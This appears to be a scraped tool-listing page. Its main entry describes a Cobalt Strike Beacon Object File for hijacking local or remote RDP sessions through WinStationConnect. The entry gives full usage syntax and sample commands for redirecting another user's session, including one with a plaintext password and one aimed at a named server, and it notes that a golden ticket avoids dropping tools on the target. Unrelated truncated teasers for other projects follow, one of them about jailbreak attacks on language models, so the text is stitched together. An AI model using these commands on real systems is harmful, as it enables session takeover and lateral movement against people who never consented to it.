Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.
To enumerate sessions locally/remotely, you could use Quser-BOF.
Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument] Command Description -------- ----------- password Specifies the password of the user who owns the session to which you want to connect. server Specifies the remote server that you want to perform RDP hijacking. Sample usage -------- Redirect session 2 to session 1 (require SYSTEM privilege): bof-rdphijack 1 2 Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon): bof-rdphijack 1 2 password P@ssw0rd123 Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2): bof-rdphijack 1 2 server SQL01.lab.internal
make
tscon.exe
In 2025 I wanted to try something new. In addition to a traditional 100 days…
presenterm lets you create presentations in markdown format and run them from your terminal, with…
Jailbreak is an attack that prompts a language model to give actionable responses to harmful…
The main philosophy of HASH is to be easy to configure and flexible to mimic…
SECurityTr8Ker is a Python application designed to monitor the U.S. Securities and Exchange Commission's (SEC)…
ripgrep is a line-oriented search tool that recursively searches the current directory for a regex…